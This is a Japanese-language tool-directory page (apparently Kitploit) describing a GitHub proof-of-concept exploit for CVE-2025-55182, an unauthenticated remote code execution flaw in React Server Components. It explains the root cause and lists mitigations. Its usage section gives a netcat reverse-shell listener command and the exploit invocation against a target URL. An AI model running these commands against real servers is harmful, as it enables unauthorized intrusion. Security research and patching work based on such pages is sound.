Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育リモートアクセスツール

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

CVE-2025-55182(React2Shell)の概念実証エクスプロイト。巧妙に細工された Flight プロトコルのペイロードを介して React Server Components に存在する、認証不要のリモートコード実行(RCE)脆弱性です。

リポジトリを見る
132ヶ月前未レビュー

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (React Server Componentsにおける未認証RCE)

CVE-2025-55182は、React2Shellとしても知られる、React Server Componentsパッケージ(バージョン19.0、19.1.0、19.1.1、19.2.0)に影響を及ぼす深刻な**未認証のリモートコード実行(RCE)**脆弱性です。

この脆弱性により、攻撃者は認証を必要とせず、単一の巧妙に細工されたHTTPリクエストを介して、脆弱なサーバー上で任意のコード実行を達成できる可能性があります。


概要

React Server Componentsは、クライアントとサーバー間で交換されるコンポーネントデータをシリアライズおよびデシリアライズするためにFlightプロトコルを使用します。

このデシリアライズ処理中の不適切な検証により、特別に細工されたペイロードが内部オブジェクト構造を操作し、危険なJavaScript実行プリミティブに到達できる可能性があります。


根本原因

この脆弱性は、React Server Components(RSC)Flightプロトコルのペイロードをデシリアライズする際の検証不足に起因します。

特別に細工されたペイロードは、以下のことを行う可能性があります:

  • 内部オブジェクト構造を操作する
  • JavaScriptのプロトタイプチェーンをたどる
  • 危険なJavaScriptコンストラクタにアクセスする
  • サーバー上で任意のコード実行を達成する

仕組み

  1. エクスプロイトは、特別に細工されたmultipart/form-dataリクエストを送信します
  2. サーバーはそのリクエストをReact Flightペイロードとして解釈します
  3. 悪意のあるチャンクがデシリアライズ中に処理されます
  4. ペイロードは:
  • 内部の実行フローを操作します
  • 危険なJavaScript実行プリミティブに到達します
  • 任意のコードを実行します
  1. 攻撃者は対象サーバー上でリモートコード実行を獲得します

🚀 使用方法

マシン上でリスナーを起動します:

root@kitploit:~
nc -lvnp 4444

エクスプロイトを実行します:

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

要件

  • 影響を受けるReact / Next.jsバージョン
  • サーバーサイドのReact Server Componentsが有効であること
  • 到達可能なRSCエンドポイント

緩和策

この脆弱性を緩和するには:

  • Reactを最新のパッチ適用済みリリースにアップグレードする
  • 利用可能なフレームワークのパッチを適用する
  • 不審なRSCリクエストを監視およびブロックする

参考

- OffSec – CVE-2025-55182 エクスプロイト分析

- Microsoft Security – React2Shell への防御

- React セキュリティアドバイザリ(公式開示)


免責事項

このプロジェクトは、以下の目的にのみ提供されています:

  • セキュリティ研究
  • 教育目的
  • 許可を得たセキュリティ評価およびペネトレーションテスト

著者は、この資料の誤用または損害について一切の責任を負いません。ユーザーは、適用されるすべての法律および規制を遵守する責任を負います。

ツールをダウンロード